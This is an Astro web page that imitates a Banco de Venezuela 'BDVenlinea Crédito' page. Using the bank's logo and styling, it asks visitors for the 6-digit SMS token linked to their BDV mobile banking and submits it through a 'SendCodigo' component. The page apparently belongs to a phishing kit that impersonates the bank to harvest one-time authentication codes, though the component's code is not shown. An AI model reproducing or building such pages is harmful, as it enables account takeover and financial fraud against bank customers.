---
import LayoutCodigo from "../layouts/Layout.astro";
import { Image } from "astro:assets";
import BDV from "../images/BDV-logo.png";
import SendCodigo from "@components/SendCodigo";
---

<LayoutCodigo
  title="BDVenlinea Crédito"
  description="Página principal de créditos del Banco de Venezuela"
>
  <main class="m-4 md:m-0 relative z-0 bg-[#ededed]">
    <h1
      class="z-20 relative lg:right-12 pt-8 text-center text-3xl font-bold text-[#0067b1]"
    >
      Validación de código BDVenlinea
    </h1>

    <!-- Contenido principal -->
    <div
      class="grid grid-cols-1 items-center p-8 m-4 bg-white max-w-[398px] mx-auto shadow-black/15 shadow-lg rounded-md relative z-10 md:ml-0 md:left-32 md:top-3"
    >
      <Image
        class="max-w-44 mx-auto"
        src={BDV}
        alt="Logo del Banco de Venezuela"
      />
      <p class="text-center text-pretty font-semibold mt-6 text-[#707070]">
        Ingresa el token de 6 dígitos que recibirás por SMS en tu número
        asociado a Banca Móvil BDV:
      </p>
      <SendCodigo client:load />
    </div>

    <!-- Tarjeta de advertencia -->
    <div
      class="bg-yellow-100 border-l-4 border-yellow-500 text-yellow-700 p-4 mb-6 max-w-[398px] mx-auto rounded-md md:mt-6 md:left-32"
    >
      <p class="font-semibold">Advertencia:</p>
      <p>
        El código puede tardar unos minutos en llegar. Por favor, sé paciente.
      </p>
    </div>

    <!-- Fondo de pantalla -->
    <div
      class="bg-cover bg-center fixed inset-0 w-full h-full -z-10 invisible md:visible"
      style="background-image: url(./images/login-codigo.png);"
    >
    </div>
  </main>
</LayoutCodigo>
